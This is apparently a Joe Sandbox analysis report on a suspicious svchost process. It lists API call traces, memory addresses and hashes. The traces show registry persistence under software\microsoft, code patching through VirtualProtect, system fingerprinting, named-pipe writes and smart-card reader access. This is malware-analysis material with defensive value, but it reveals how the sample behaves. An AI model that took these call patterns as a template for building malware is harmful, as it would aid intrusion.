                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                            • String ID: 92f35d24a$software\microsoft
                                                                                                                                                                                                            • API String ID: 2113243795-2691776517
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: /$UT
                                                                                                                                                                                                            • API String ID: 0-1626504983
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00004070,?,00000000,75495CE0,?,02C82840,?), ref: 02C97B63
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,02C82840,?), ref: 02C97B66
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C97B7B
                                                                                                                                                                                                            • CreateFileA.KERNEL32(02C82840,40000000,00000003,00000000,00000002,00000080,00000000,?,02C82840,?), ref: 02C97BD2
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,02C82840,?), ref: 02C97BF5
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02C82840,?), ref: 02C97BF8
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,02C82840,?), ref: 02C97C04
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,02C82840,?), ref: 02C97C07
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000010,?,02C82840,?), ref: 02C97C1A
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,02C82840,?), ref: 02C97C1D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$AllocAllocateCreateFileFreeValidatememset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 529598968-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C831D4
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(00000104,software\microsoft,00000000,00000101,80000002,?,75570F10,00000000), ref: 02C831F7
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(80000002,?,00000000,00000001,00000000,00000104,?,75570F10,00000000), ref: 02C8321A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000015,?,75570F10,00000000), ref: 02C8328D
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,75570F10,00000000), ref: 02C83294
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C832A4
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(80000002,?,75570F10,00000000), ref: 02C832D2
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heapmemset$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                            • String ID: software\microsoft
                                                                                                                                                                                                            • API String ID: 4043890984-3673152959
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000003E8), ref: 02C8924B
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,00000018,00000040,?), ref: 02C89298
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 02C892C7
                                                                                                                                                                                                            • FlushInstructionCache.KERNEL32(00000000), ref: 02C892CE
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,00000018,?,?), ref: 02C892E2
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(?), ref: 02C892F9
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C89301
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ProtectVirtual$CacheCurrentFlushInstructionMutexObjectProcessReleaseSingleSleepWait
                                                                                                                                                                                                            • String ID: P0Wu
                                                                                                                                                                                                            • API String ID: 842647815-465009422
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C88BF7
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02C88C09
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(?,software\microsoft,00000000,00000102,?,?,?,?,02C88DC2), ref: 02C88C23
                                                                                                                                                                                                            • RegSetValueExA.KERNEL32(?,92f35cb6a,00000000,00000004,?,00000004,software\microsoft,00000000,00000102,?,?,?,?,02C88DC2), ref: 02C88C40
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(?,?,?,?,02C88DC2), ref: 02C88C4A
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,02C88DC2), ref: 02C88C54
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AdminCloseCountFlushOpenTickUserValue
                                                                                                                                                                                                            • String ID: 92f35cb6a$software\microsoft
                                                                                                                                                                                                            • API String ID: 287100044-1370861648
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02C93E6F
                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02C93EA8
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C93F13
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C93F76
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _snprintf$DirectoryInformationSystemVolumeWindows
                                                                                                                                                                                                            • String ID: 1234567890QWERTYUIOPASDFGHJKLZXCVBNM$6D1DA380$92F35C2Aa
                                                                                                                                                                                                            • API String ID: 2823094833-1580445031
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C848D8
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,92f35bc3a,00000000,00000000,00000000,?), ref: 02C8491A
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 02C84924
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(-80000001), ref: 02C848EA
                                                                                                                                                                                                              • Part of subcall function 02C73430: IsUserAnAdmin.SHELL32 ref: 02C73438
                                                                                                                                                                                                              • Part of subcall function 02C73430: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 02C7346F
                                                                                                                                                                                                              • Part of subcall function 02C73430: RegQueryValueExA.ADVAPI32(?,92f35d24a,00000000,?,00000000,?), ref: 02C7348C
                                                                                                                                                                                                              • Part of subcall function 02C73430: RegCloseKey.ADVAPI32(?), ref: 02C73496
                                                                                                                                                                                                              • Part of subcall function 02C73430: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C734C9
                                                                                                                                                                                                              • Part of subcall function 02C73430: RegQueryValueExA.KERNEL32(?,92f35d24a,00000000,?,00000000,?), ref: 02C734E6
                                                                                                                                                                                                              • Part of subcall function 02C73430: RegCloseKey.ADVAPI32(?), ref: 02C734F0
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                            • String ID: 92F3547Aa$92f35bc3a$software\microsoft
                                                                                                                                                                                                            • API String ID: 2113243795-3269791993
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,7556F550,00000000,76C0BD50,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C88FF8
                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,00000000,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89020
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000000,?,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890B5
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,00000000,00000040,02C8839A,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C890CA
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,00000000,02C8839A,?,?,?,00000000,00000000,?,?,?,?,?,?,02C8839A,00000000), ref: 02C890FA
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,00000000,02C8839A,?,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89106
                                                                                                                                                                                                              • Part of subcall function 02C89130: WaitForSingleObject.KERNEL32(?,000003E8,00000000,02C89113,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C8913C
                                                                                                                                                                                                              • Part of subcall function 02C89130: GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89146
                                                                                                                                                                                                              • Part of subcall function 02C89130: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C8914D
                                                                                                                                                                                                              • Part of subcall function 02C89130: memset.MSVCRT ref: 02C8915E
                                                                                                                                                                                                              • Part of subcall function 02C89130: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C891AA
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,7556F550,00000000,76C0BD50,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C89117
                                                                                                                                                                                                            • FlushInstructionCache.KERNEL32(00000000,?,?,?,02C8839A,00000000,02C881F0,02CC7D6C), ref: 02C8911E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Virtual$Protect$AllocHeapProcess$CacheCurrentFlushInstructionMutexObjectReleaseSingleWaitmemcpymemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2609073853-0
                                                                                                                                                                                                            • Opcode ID: 8f021d533cd75e031d93a37704bb4763fec1ccb5118302501cceb90092ad35a6
                                                                                                                                                                                                            • Instruction ID: 7690c3e9f1e6a4d59b50bc6c9277e97bcbfb76cd1f993ad7a093bdfbb91cb0f5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f021d533cd75e031d93a37704bb4763fec1ccb5118302501cceb90092ad35a6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22410072A40216B7CB10AE788C88FBB777AEF94258F448619F94597384DB35E901C7E0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,0006AFB0,00000000,00000000,00000000,?,02C97874,00000000,00140B17), ref: 02C973D5
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,02C97874,00000000,00140B17), ref: 02C973DC
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C973EF
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,02C97870,?,02C97874,00000000,00140B17), ref: 02C9749E
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,02C97874,00000000,00140B17), ref: 02C974A1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,02C97874,00000000,00140B17), ref: 02C974AD
                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,02C97874,00000000,00140B17), ref: 02C974B0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$AllocateFreeValidatememset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 219023833-0
                                                                                                                                                                                                            • Opcode ID: ee46b0cd924f0b3656249b19cb5aba9a251340cd2f2c060f71cc093169004b01
                                                                                                                                                                                                            • Instruction ID: bcd05b34dfdb7e001c00c32e838f1f62bc3ad5fa811ead47d707cc04517c8152
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee46b0cd924f0b3656249b19cb5aba9a251340cd2f2c060f71cc093169004b01
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6421EFB0A017009FCB21AFA5D888ACBFFE8FF4A744B00881DE55E8B201C734A405CF92
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004022D6
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 004022F6
                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 004022FC
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040231A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040231D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2676559004.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                            • String ID: \\.\pipe\acsipc_server
                                                                                                                                                                                                            • API String ID: 3225117150-898603304
                                                                                                                                                                                                            • Opcode ID: f30bb11f5613f8d38f8c23486348982fdc31315c85d836d9b114ebf2302f727f
                                                                                                                                                                                                            • Instruction ID: c460779fd0431372b53d2531d074c5320f53f755a2dac54515a3a2487e8d4eb8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f30bb11f5613f8d38f8c23486348982fdc31315c85d836d9b114ebf2302f727f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA31F4B1C0121CAFDB10DFD5D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C76570: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C76596
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765B7
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765DD
                                                                                                                                                                                                              • Part of subcall function 02C76570: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765E4
                                                                                                                                                                                                              • Part of subcall function 02C76570: memset.MSVCRT ref: 02C765F4
                                                                                                                                                                                                              • Part of subcall function 02C76570: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76616
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76622
                                                                                                                                                                                                              • Part of subcall function 02C76570: HeapValidate.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76629
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76636
                                                                                                                                                                                                              • Part of subcall function 02C76570: HeapFree.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C7663D
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7665D
                                                                                                                                                                                                              • Part of subcall function 02C76570: CloseHandle.KERNEL32(00000000), ref: 02C7666E
                                                                                                                                                                                                              • Part of subcall function 02C76570: IsBadWritePtr.KERNEL32(?,00000004), ref: 02C7667E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000013,?,00000000,00000000,00000000,75495CE0,02C82897), ref: 02C7696C
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02C76973
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C76983
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,75495CE0,02C82897), ref: 02C769A5
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C769A8
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C769B5
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C769B8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$File$AllocateFreeHandleValidatememset$CloseCreateInformationReadSizeWrite
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3393195770-0
                                                                                                                                                                                                            • Opcode ID: f377347343ddea82a5b582f989365a99ecd9eccaf66547f3de79fc0db7b6716e
                                                                                                                                                                                                            • Instruction ID: 58932f77280adc2f93b47e823172b600c7e8a6d5802ac6a8ee26dcbea9958889
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f377347343ddea82a5b582f989365a99ecd9eccaf66547f3de79fc0db7b6716e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5511E572F41658A7C725ABA5AC48F9BB76CDFC0B55F140168B909D7280DB70DE14CBE0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,software\microsoft,00000000,00000102,?,?,?,02C73A91,?), ref: 02C737E0
                                                                                                                                                                                                            • RegSetValueExA.KERNEL32(00000000,92f35d9aa,00000000,00000004,?,00000004,?,?,02C73A91,?), ref: 02C737FC
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(00000000,?,?,02C73A91,?), ref: 02C7380A
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,?,?,02C73A91,?), ref: 02C73818
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseFlushOpenValue
                                                                                                                                                                                                            • String ID: 92f35d9aa$software\microsoft
                                                                                                                                                                                                            • API String ID: 2510291871-309072765
                                                                                                                                                                                                            • Opcode ID: e63f04f99148dba3b6b7ab9b68f6be2725fa1b7d9692b7ea7081e9efd6cc894c
                                                                                                                                                                                                            • Instruction ID: 4ccb169730d5804e2a1c6b65925daf7e587f849852541bb732c89dd95e9780d8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e63f04f99148dba3b6b7ab9b68f6be2725fa1b7d9692b7ea7081e9efd6cc894c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3F030B5E80248FBE711CA91DD49FAA776CDF04B44F108699FA01E7140D770EA10A7A5
APIs
• GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02C97AB6
• HeapValidate.KERNEL32(00000000), ref: 02C97ABD
• GetProcessHeap.KERNEL32(00000000,?), ref: 02C97ACA
• HeapFree.KERNEL32(00000000), ref: 02C97AD1
• GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 02C97AE0
• HeapValidate.KERNEL32(00000000), ref: 02C97AE3
• GetProcessHeap.KERNEL32(00000000,?), ref: 02C97AF0
• HeapFree.KERNEL32(00000000), ref: 02C97AF3
Memory Dump Source
• Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
Yara matches
Similarity
• API ID: Heap$Process$FreeValidate
• String ID:
Memory Dump Source
• Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
Yara matches
Similarity
APIs
• CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,00000000), ref: 02C96ED4
• MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,02C97817), ref: 02C96EEE
• memcpy.MSVCRT(00000000,?,?,?,02C97817), ref: 02C96F16
• UnmapViewOfFile.KERNEL32(?,?,?,?,?,02C97817), ref: 02C96F22
  • Part of subcall function 02C93E00: GetHandleInformation.KERNEL32(?,00000000), ref: 02C93E14
  • Part of subcall function 02C93E00: CloseHandle.KERNEL32(?), ref: 02C93E25
• memcpy.MSVCRT(?,?,00140B17,00000000,00000000,00140B17,?,02C97817), ref: 02C96F4E
• WriteFile.KERNEL32(?,?,00140B17,02C97817,00000000,00140B17), ref: 02C96F80
Memory Dump Source
• Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
Yara matches
Similarity
• API ID: File$HandleViewmemcpy$CloseCreateInformationMappingUnmapWrite
• String ID:
APIs
• SCardEstablishContext.WINSCARD(00000002,00000000,00000000,02C856A3,00000000), ref: 02C93D45
• SCardListReadersA.WINSCARD(02C856A3,00000000,?,FFFFFFFF), ref: 02C93D5C
• SCardConnectA.WINSCARD(02C856A3,?,00000002,00000003,?,?), ref: 02C93D8E
• SCardFreeMemory.WINSCARD(02C856A3,?), ref: 02C93DC9
• SCardReleaseContext.WINSCARD(?), ref: 02C93DDD
• SCardReleaseContext.WINSCARD(02C856A3), ref: 02C93DE7
Memory Dump Source
• Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
Yara matches
Similarity
